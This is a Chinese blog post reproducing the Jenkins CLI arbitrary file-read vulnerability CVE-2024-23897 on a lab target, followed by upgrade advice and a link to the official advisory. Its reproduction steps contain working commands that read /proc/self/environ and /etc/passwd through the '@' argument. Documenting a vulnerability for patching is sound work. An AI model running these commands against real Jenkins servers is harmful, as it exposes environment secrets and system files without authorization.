Jenkins 任意文件读取(CVE-2024-23897)修复及复现

Jenkins任意文件读取漏洞CVE-2024-23897修复及复现


Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。

漏洞详情

Jenkins 有一个内置的命令行界面(CLI),可从脚本或 shell 环境访问 Jenkins。处理 CLI 命令时, Jenkins 使用args4j库解析 Jenkins 控制器上的命令参数和选项。

近日,Jenkins 处理 CLI 命令的命令解析器中的 expandAtFile 功能存在任意文件读取漏洞,未经身份认证的远程攻击者利用该漏洞可以读取部分文件的有限行内容,攻击者经过身份验证或目标 Jenkins 更改了默认 “Security” 配置可以通过该漏洞读取任意文件,攻击者进一步利用该漏洞并结合其他功能可能导致任意代码执行。

影响范围

Jenkins 版本<= 2.441
Jenkins 版本<= LTS 2.426.2

漏洞复现

1、访问http://靶场IP:8080 显示Jenkins页面
首页
2、下载官方提供的命令行客户端

wget http://IP:8080/jnlpJars/jenkins-cli.jar

下载cli
3、使用该工具读取目标服务器的/proc/self/environ文件

java -jar jenkins-cli.jar -s http://IP:8080/ -http help 1 "@/proc/self/environ"

读取文件

4、使用该工具读取目标服务器的/etc/passwd文件

java -jar jenkins-cli.jar -s http://IP:8080/ who-am-i @/etc/passwd

读取passwd
5、java不兼容
如出现下图情况为java版本不兼容,卸载本机旧java,然后安装新版兼容的java版本即可。
不兼容

修复建议

升级至安全版本
参考链接:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
官网下载:https://www.jenkins.io/download/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

鸭梨山大。

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值